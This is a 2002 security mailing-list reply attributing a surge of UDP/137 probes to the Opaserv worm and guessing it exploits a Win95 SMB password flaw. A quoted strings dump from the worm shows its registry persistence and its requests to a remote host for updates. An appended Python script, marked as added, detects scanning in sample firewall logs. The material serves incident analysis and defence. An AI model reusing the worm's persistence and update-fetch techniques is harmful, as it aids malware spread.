Security Incidents mailing list archives

Re: Unusual volume: UDP:137 probes


From: Alain Fauconnet <alain () cscoms net>
Date: Fri, 4 Oct 2002 14:13:55 +0700

On Fri, Oct 04, 2002 at 07:58:18AM +1200, Nick FitzGerald wrote:
Richard.Grant () mail state ky us wrote:
Two...

You are right that Bugbear does not produce the flood of port 137 
traffic currently being reported.  Bugbear does some spreading via 
open or otherwise accessible shares (those writable with the 
permissions of the user that ran the EXE) but it uses standard 
known network resource enumeration APIs to do its work.  Opaserv (aka 
Scrup, Scrsvr, Opasoft) aggressively scans for machines listening on
port 137 and is the likely source of most of the increased port 137 
activity.

ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Windows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Internet Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat.ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host:
<<snip>>


Talking of Opaserv, I have an example of a Win95 OSR2.1 box (yes, I
know) which saw SCRSVR.EXE appear in its Windows folder while online.
McAfee caught it immediately so it didn't have a chance to run.
However this box *did* have passwords set on the shares (yes, all of
them, I have checked).

These passwords were quite non-obvious so I doubt that they could be
found as a result of a brute-force attack.

I know that Win95 had its share of bugs regarding SMB passwords. This
one looks like a good candidate:

http://security-archive.merton.ox.ac.uk/bugtraq-200010/0228.html
NSFOCUS Security Advisory(SA2000-05)

But then it means that Opaserv goes beyond checking for passwordless
shares (that's all I have seen written so far). It also exploits known
vulnerabilities.

Greets,
_Alain_
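As an added illustration, not part of the original thread, here is a small detector run over constructed netfilter-style firewall log lines that flags sources fanning out UDP/137 probes across many hosts, the pattern the post attributes to Opaserv rather than Bugbear. The log format, the addresses and the five-target threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample firewall log lines in netfilter syslog format (not from the
# original post). 203.0.113.7 sweeps UDP/137 across consecutive addresses the way
# a share-scanning worm does; 203.0.113.9 is a single ordinary NetBIOS name lookup
# followed by a normal SMB session to the same host.
SAMPLE_LOG = """\
Oct  4 13:01:02 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.1 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:02 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.2 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:02 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.3 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:03 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.4 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:03 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.5 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:03 fw kernel: IN=eth0 OUT= SRC=203.0.113.7 DST=198.51.100.6 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:05 fw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.20 PROTO=UDP SPT=137 DPT=137 LEN=78
Oct  4 13:01:06 fw kernel: IN=eth0 OUT= SRC=203.0.113.9 DST=198.51.100.20 PROTO=TCP SPT=1045 DPT=139 LEN=48
"""

LINE_RE = re.compile(r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+)")

def parse_netbios_probes(log_text):
    """Yield (src, dst) for every UDP datagram sent to port 137 (NetBIOS name service)."""
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m and m["proto"] == "UDP" and m["dpt"] == "137":
            yield m["src"], m["dst"]

def find_scanners(log_text, min_targets=5):
    """Return {src: sorted distinct targets} for sources that probed UDP/137 on at
    least min_targets distinct hosts. A legitimate name lookup goes to one host
    (or a broadcast); a worm sweep fans out across many addresses."""
    targets = defaultdict(set)
    for src, dst in parse_netbios_probes(log_text):
        targets[src].add(dst)
    return {src: sorted(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}

def is_sequential(addrs):
    """True when the probed last octets form one contiguous ascending run (sweep signature)."""
    octets = sorted(int(a.rsplit(".", 1)[1]) for a in addrs)
    return octets == list(range(octets[0], octets[0] + len(octets)))

if __name__ == "__main__":
    for src, dsts in find_scanners(SAMPLE_LOG).items():
        print(f"{src}: {len(dsts)} distinct UDP/137 targets, sequential={is_sequential(dsts)}")
```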

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
